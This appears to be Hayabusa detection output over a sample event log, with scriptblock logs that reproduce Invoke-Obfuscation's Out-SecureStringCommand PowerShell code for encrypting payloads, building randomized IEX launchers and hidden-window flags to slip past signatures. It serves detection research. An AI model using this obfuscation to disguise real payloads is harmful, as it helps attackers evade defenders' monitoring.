Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.266 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.266 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"mizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.271 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-SecureStringCommand { <# .SYNOPSIS Generates AES-encrypted SecureString object out of three possible syntaxes for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-SecureStringCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-SecureStringCommand encrypts an input PowerShell scriptblock or path as a SecureString object. It randomly selects between three different syntaxes for accomplishing this. The purpose is to highlight to the Blue Team that there are more novel ways to encode/encrypt a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. 
.PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-SecureStringCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NoProfi -NonIn "" IEX( ([Runtime.InteropServices.Marshal]::PtrToStringUni( [Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocUnicode( $('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' |ConvertTo-SecureString -Key 241,131,91,52,14,165,71,51,19,86,1,104,87,220,235,62) ))) )"" C:\PS> Out-SecureStringCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive -PassThru (New-Object Management.Automation.PSCredential ' ', ( '76492d1116743f0423413b16050a5345MgB8AEUAcQBKAHkAegBqAHUAQwBNAC8AeABPAHUAbgBlADAAUABMAHQARQAyAGcAPQA9AHwAMgBlAGEANQBiADMAMAA0ADMANQBkAGIAMQA2AGUAYwA2ADIANwAyADEANAA5ADUAYwAyADkAOAAzADUAZAAwADcANAAwADQAOQA0AGQAZQAwADUAYwBjADUAZgAwADYAYgA0AGIAYQA0AGYANwAxADUAMwA1AGUANQAxAGMANwBiADAANgA3ADgAOABmAGQAYwBjADYAMAA4AGYAZQAyADEAZAAyADQAMgBkAGYAYwBmADkAZQA5ADkAMwBmAGMAZAAzADgAOQAwADEANQBhADcANAA5AGUANQBiAGMAOAA2ADYAOAAxAGYAMwAxAGYAMwA4AGQANAA0ADAAYgA3ADUAMwBkADcAMQAwADAANABlAGIAOQAxAGIAOQAxADcAZgBjAGEANAA4ADUAOQBlADUAOAA1AGEANwBjADUAYQAwADgAOAAyAGEAMAAzADQAMQA3ADYAMwA0AGUAMwBiADUAZgA3AGMAMwA5AGQAZQAyADkAMgAxADAAMgA5ADUAMwBmADMAOAA5ADQAYwAyAGUANwA5AGMAMgA5ADEAMAAwAGEAMgAyAGQANQA4ADAAZQBiAGMAZAA1ADkAMgBlAGQAOAAyADIAZAA3ADQAYQBmADIANwAwADQAMQAzADQANgAxADQAMwA5ADgANQBlADIANQA2ADEAMwBiAGUAMwBhAGMAMQAwADIAYQBjAGMAYgA5AGUAYQBjAGQAZQAyADYAYgAyADkAZABjAGEAMAA4ADIANAA1AGMAOAAzADgAZgAyAGEAMABlAGYANAAwAGEAMgAyADgANQBlADkAMgAyAGEANgA0ADQANwBlADAAYgA0ADkAMgBkAGMANgAwAGMANwA3ADUAZABhADkAMgA1ADAAYgA0ADgAYQBmAGIAMQBjADEAMgA2ADEAZgA0ADkANgA4AGYAMQA0ADkAMAA0AGYANwBjAGMAYQBiAGQAZQA4ADIAMAA1AGUAZgA4ADMAZQAwAGMAYQBlADQAMgBkAGIAOQBkADUANwAzADQANwAyAGIAYwAxADQAYwBiAGEAZAA2AGYAZQAzADUAYgAxADgAYgBhADcANQAyADkAMAAwADcAMAA0ADQANgBlAGMAYQA1ADQAMQBhAGYAYgAzADYANwBjAGIAZgAyAGEAYgBkADgAZAAwAGEAZgBmADYAMQA2AGIAMAA1AGIANQA=' |ConvertTo-SecureString -Key 205,39,9,9,104,139,104,94,252,20,93,132,29,171,56,2 )).GetNetworkCredential().Password | Invoke-Expression .NOTES The size limit for a single SecureString object input is 65,536 characters. However, this will consume significant resources on the target system when decoding a SecureString object of this size (50% CPU and ~30 seconds on several test VMs). For larger payloads I would recommend chunking your payload and encoding/encrypting each piece separately and then reassembling each decoded/decrypted piece during runtime. 
I have a POC that does this and will be releasing a STAGING set of functions soon to accomplish this very task. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Convert $ScriptString to a SecureString object. $SecureString = ConvertTo-SecureString $ScriptString -AsPlainText -Force # Randomly select the key length. Supported key lengths for SecureString (AES) are 16, 24 and 32. $KeyLength = Get-Random @(16,24,32) # Randomly select the key value and how it will be formatted. Switch(Get-Random -Minimum 1 -Maximum 3) { 1 { # Generate random key of length $KeyLength. $SecureStringKey = @() For($i=0; $i -lt $KeyLength; $i++) { $SecureStringKey += Get-Random -Minimum 0 -Maximum 256 } $SecureStringKeyStr = $SecureStringKey -Join ',' } 2 { # Generate sequential key of length $KeyLength with random array bounds. # To save space use shorthand array notation in final command with $SecureStringKeyStr. 
$LowerBound = (Get-Random -Minimum 0 -Maximum (256-$KeyLength)) $UpperBound = $LowerBound + ($KeyLength - 1) Switch(Get-Random @('Ascending','Descending')) { 'Ascending' {$SecureStringKey = ($LowerBound..$UpperBound); $SecureStringKeyStr = ""($LowerBound..$UpperBound)""} 'Descending' {$SecureStringKey = ($UpperBound..$LowerBound); $SecureStringKeyStr = ""($UpperBound..$LowerBound)""} default {Write-Error ""An invalid array ordering option was generated for switch block.""; Exit;} } } default {Write-Error ""An invalid random number was generated for switch block.""; Exit;} } # Convert SecureString object to text that we can load on target system. $SecureStringText = $SecureString | ConvertFrom-SecureString -Key $SecureStringKey # Generate random syntax for -Key command argument. $Key = (Get-Random -Input @(' -Key ',' -Ke ',' -K ')) # Randomly choose member invocation syntax. "".Invoke"" syntax below is not necessary for PS 3.0+ $PtrToStringAuto = (Get-Random -Input @('PtrToStringAuto',('([Runtime.InteropServices.Marshal].GetMembers()[' + (Get-Random -Input @(3,5)) + '].Name).Invoke'))) $PtrToStringUni = (Get-Random -Input @('PtrToStringUni' ,('([Runtime.InteropServices.Marshal].GetMembers()[' + (Get-Random -Input @(2,4)) + '].Name).Invoke'))) $PtrToStringAnsi = (Get-Random -Input @('PtrToStringAnsi',('([Runtime.InteropServices.Marshal].GetMembers()[' + (Get-Random -Input @(0,1)) + '].Name).Invoke'))) # Below four notations are commented out as they only work on PS 3.0+ #$PtrToStringBSTR = (Get-Random -Input @('PtrToStringBSTR' ,'([Runtime.InteropServices.Marshal].GetMembers()[142].Name).Invoke')) #$SecureStringToBSTR = (Get-Random -Input @('SecureStringToBSTR' ,'([Runtime.InteropServices.Marshal].GetMembers()[162].Name)')) #$SecureStringToGlobalAllocUnicode = (Get-Random -Input @('SecureStringToGlobalAllocUnicode','([Runtime.InteropServices.Marshal].GetMembers()[169].Name)')) #$SecureStringToGlobalAllocAnsi = (Get-Random -Input @('SecureStringToGlobalAllocAnsi' 
,'([Runtime.InteropServices.Marshal].GetMembers()[168].Name)')) # Randomize the case versions for necessary operations. $PtrToStringAuto = ([Char[]]""[Runtime.InteropServices.Marshal]::$PtrToStringAuto("" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PtrToStringUni = ([Char[]]""[Runtime.InteropServices.Marshal]::$PtrToStringUni("" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PtrToStringAnsi = ([Char[]]""[Runtime.InteropServices.Marshal]::$PtrToStringAnsi("" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PtrToStringBSTR = ([Char[]]'[Runtime.InteropServices.Marshal]::PtrToStringBSTR(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SecureStringToBSTR = ([Char[]]'[Runtime.InteropServices.Marshal]::SecureStringToBSTR(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SecureStringToGlobalAllocUnicode = ([Char[]]'[Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocUnicode(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SecureStringToGlobalAllocAnsi = ([Char[]]'[Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocAnsi(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $NewObject = ([Char[]]'New-Object ' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PSCredential = ([Char[]]'Management.Automation.PSCredential ' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' 
$ConvertToSecureString = ([Char[]]'ConvertTo-SecureString' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Key = ([Char[]]$Key | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $GetNetworkCredential = ([Char[]]').GetNetworkCredential().Password' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Set syntax for running ConvertTo-SecureString cmdlet. $ConvertToSecureStringSyntax = '$(' + ""'$SecureStringText'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureString + ' '*(Get-Random -Input @(0,1)) + $Key + ' '*(Get-Random -Input @(0,1)) + $SecureStringKeyStr + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate the code that will decrypt and execute the payload and randomly select one. 
$NewScriptArray = @() $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringAuto + ' '*(Get-Random -Input @(0,1)) + $SecureStringToBSTR + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringUni + ' '*(Get-Random -Input @(0,1)) + $SecureStringToGlobalAllocUnicode + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringAnsi + ' '*(Get-Random -Input @(0,1)) + $SecureStringToGlobalAllocAnsi + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringBSTR + ' '*(Get-Random -Input @(0,1)) + $SecureStringToBSTR + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $NewObject + ' '*(Get-Random -Input @(0,1)) + $PSCredential + ' '*(Get-Random -Input @(0,1)) + ""' '"" + ',' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""'$SecureStringText'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureString + ' '*(Get-Random -Input @(0,1)) + $Key + ' '*(Get-Random -Input @(0,1)) + $SecureStringKeyStr + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + $GetNetworkCredential # Select random option from above. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. 
# Though far from fully built out (and not sure that I ever will), these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. 
$InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression # Select random option from above. $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBou",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.271 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.271 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. 
# # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-SecureStringCommand { <# .SYNOPSIS Generates AES-encrypted SecureString object out of three possible syntaxes for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-SecureStringCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-SecureStringCommand encrypts an input PowerShell scriptblock or path as a SecureString object. It randomly selects between three different syntaxes for accomplishing this. The purpose is to highlight to the Blue Team that there are more novel ways to encode/encrypt a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. 
.PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-SecureStringCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NoProfi -NonIn "" IEX( ([Runtime.InteropServices.Marshal]::PtrToStringUni( [Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocUnicode( $('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' |ConvertTo-SecureString -Key 241,131,91,52,14,165,71,51,19,86,1,104,87,220,235,62) ))) )"" C:\PS> Out-SecureStringCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru (New-Object Management.Automation.PSCredential ' ', ( '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' |ConvertTo-SecureString -Key 205,39,9,9,104,139,104,94,252,20,93,132,29,171,56,2 )).GetNetworkCredential().Password | Invoke-Expression .NOTES The size limit for a single SecureString object input is 65,536 characters. However, this will consume significant resources on the target system when decoding a SecureString object of this size (50% CPU and ~30 seconds on several test VMs). For larger payloads I would recommend chunking your payload and encoding/encrypting each piece separately and then reassembling each decoded/decrypted piece during runtime. 
